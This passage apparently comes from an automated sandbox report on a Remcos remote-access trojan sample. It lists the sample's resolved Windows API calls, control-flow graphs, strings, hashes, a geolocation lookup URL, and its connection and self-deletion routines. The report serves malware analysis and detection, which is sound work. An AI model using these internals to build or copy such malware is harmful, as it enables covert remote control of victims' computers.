                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                          • API String ID: 4236061018-3687161714
                                                                                          • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                          • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                          • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                          • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                                                                          Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1099 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1104 41b456-41b477 InternetReadFile 1099->1104 1105 41b479-41b499 call 4020b7 call 403376 call 401fd8 1104->1105 1106 41b49d-41b4a0 1104->1106 1105->1106 1108 41b4a2-41b4a4 1106->1108 1109 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1106->1109 1108->1104 1108->1109 1112 41b4b8-41b4c2 1109->1112
                                                                                          APIs
                                                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                          Strings
                                                                                          • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                                                          • String ID: http://geoplugin.net/json.gp
                                                                                          • API String ID: 3121278467-91888290
                                                                                          • Opcode ID: abe68a4eb927ca0f04f94675361b010e13c10aeedf850dedc819be2a7387801d
                                                                                          • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                          • Opcode Fuzzy Hash: abe68a4eb927ca0f04f94675361b010e13c10aeedf850dedc819be2a7387801d
                                                                                          • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                          Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                            • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                                                            • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                          • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                          • ExitProcess.KERNEL32 ref: 0040F905
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                          • String ID: 5.1.3 Pro$override$pth_unenc
                                                                                          • API String ID: 2281282204-1392497409
                                                                                          • Opcode ID: 3fa15e960bbc6a4ad227c554a9012a3cdb08db0b8ab9406bce24a23a70318cf6
                                                                                          • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                          • Opcode Fuzzy Hash: 3fa15e960bbc6a4ad227c554a9012a3cdb08db0b8ab9406bce24a23a70318cf6
                                                                                          • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                                          Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1191 404f51-404f5f 1192 404f65-404f6c 1191->1192 1193 404fea 1191->1193 1195 404f74-404f7b 1192->1195 1196 404f6e-404f72 1192->1196 1194 404fec-404ff1 1193->1194 1197 404fc0-404fe8 CreateEventA CreateThread 1195->1197 1198 404f7d-404fbb GetLocalTime call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1195->1198 1196->1197 1197->1194 1198->1197
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                          Strings
                                                                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$EventLocalThreadTime
                                                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                                                          • API String ID: 2532271599-1507639952
                                                                                          • Opcode ID: bb891c265521bbac9f5eb37e18d522f6691bbdaa432d4adda5fe173935d73b6f
                                                                                          • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                          • Opcode Fuzzy Hash: bb891c265521bbac9f5eb37e18d522f6691bbdaa432d4adda5fe173935d73b6f
                                                                                          • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                          Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,011BD630), ref: 004338DA
                                                                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1815803762-0
                                                                                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                          • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                          • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                          Function 0041B69E Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                                                          • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Name$ComputerUser
                                                                                          • String ID:
                                                                                          • API String ID: 4229901323-0
                                                                                          • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                          • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                          • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                          • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                          Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                          • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                          Function 0040EA00 Relevance: 53.3, APIs: 15, Strings: 15, Instructions: 795COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 100 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->100 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e-40ec45 call 40d0a4 70->80 79->80 99 40ec27-40ec3d call 401fab call 4139e4 79->99 88 40ec47-40ec49 80->88 89 40ec4e-40ec55 80->89 92 40ef2c 88->92 93 40ec57 89->93 94 40ec59-40ec65 call 41b354 89->94 92->49 93->94 104 40ec67-40ec69 94->104 105 40ec6e-40ec72 94->105 99->80 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 100->126 104->105 108 40ecb1-40ecc4 call 401e65 call 401fab 105->108 109 40ec74 call 407751 105->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 117 40ec79-40ec7b 109->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->108 141 40ec9c-40eca2 120->141 121->120 156 40f3e0-40f3ea call 40dd7d call 414f65 126->156 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 203 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->203 179 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->179 180 40edc5-40edcc 178->180 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 179->234 183 40ee4a-40ee54 call 409092 180->183 184 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 180->184 193 40ee59-40ee7d call 40247c call 434829 183->193 184->193 211 40ee8c 193->211 212 40ee7f-40ee8a call 436f10 193->212 203->178 217 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 211->217 212->217 272 40eede-40ef03 call 434832 call 401e65 call 40b9f8 217->272 286 40f017-40f019 234->286 287 40effc 234->287 272->234 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 272->288 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->234 306 40ef2a 288->306 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->92 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 356 40f194-40f1a7 call 401e65 call 401fab 346->356 357 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->357 367 40f207-40f21a call 401e65 call 401fab 356->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 400 40f27b-40f27c SetProcessDEPPolicy 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 409 40f2b4-40f2bb 405->409 410 40f2a8-40f2b2 CreateThread 405->410 413 40f2c9 409->413 414 40f2bd-40f2c0 409->414 410->409 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 413->418 415 40f2c2-40f2c7 414->415 416 40f307-40f31a call 401fab call 41353a 414->416 415->418 425 40f31f-40f322 416->425 418->416 425->156 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                          APIs
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe,00000104), ref: 0040EA29
                                                                                            • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                          • String ID: Access Level: $Administrator$C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-35QZU7$Software\$User$del$del$exepath$licence$license_code.txt
                                                                                          • API String ID: 2830904901-1861927298
                                                                                          • Opcode ID: 31f67b7f9349debde381042254657aa1b99cc28215975a66d86bcc0b5d8edffb
                                                                                          • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                          • Opcode Fuzzy Hash: 31f67b7f9349debde381042254657aa1b99cc28215975a66d86bcc0b5d8edffb
                                                                                          • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                                                                          Function 00414F65 Relevance: 35.8, APIs: 5, Strings: 15, Instructions: 809sleepnetworkCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 448 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 461 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 448->461 462 414faf-414fb6 Sleep 448->462 477 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->477 478 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->478 462->461 477->478 531 415127-41512e 478->531 532 415119-415125 478->532 533 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 531->533 532->533 560 415210-41521e call 40482d 533->560 561 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 533->561 567 415220-415246 call 402093 * 2 call 41b580 560->567 568 41524b-415260 call 404f51 call 4048c8 560->568 584 415ade-415af0 call 404e26 call 4021fa 561->584 567->584 583 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 568->583 568->584 648 4153bb-4153c8 call 405aa6 583->648 649 4153cd-4153f4 call 401fab call 4135e1 583->649 597 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 584->597 598 415b18-415b20 call 401e8d 584->598 597->598 598->478 648->649 655 4153f6-4153f8 649->655 656 4153fb-4157ba call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->656 655->656 782 4157bc call 404aa1 656->782 783 4157c1-415a45 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a4a-415a51 783->901 902 415a53-415a5a 901->902 903 415a65-415a6c 901->903 902->903 904 415a5c-415a5e 902->904 905 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 903->905 906 415a6e-415a73 call 40b08c 903->906 904->903 917 415aac-415ab8 CreateThread 905->917 918 415abe-415ad9 call 401fd8 * 2 call 401f09 905->918 906->905 917->918 918->584
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                          • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$ErrorLastLocalTime
                                                                                          • String ID: | $%I64u$5.1.3 Pro$C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-35QZU7$TLS Off$TLS On $hlight$name
                                                                                          • API String ID: 524882891-2282533485
                                                                                          • Opcode ID: 635f21381c8b2e83a4a2e9ec1df68d3819f873d9cd7c9afd032c5074743bbbae
                                                                                          • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                          • Opcode Fuzzy Hash: 635f21381c8b2e83a4a2e9ec1df68d3819f873d9cd7c9afd032c5074743bbbae
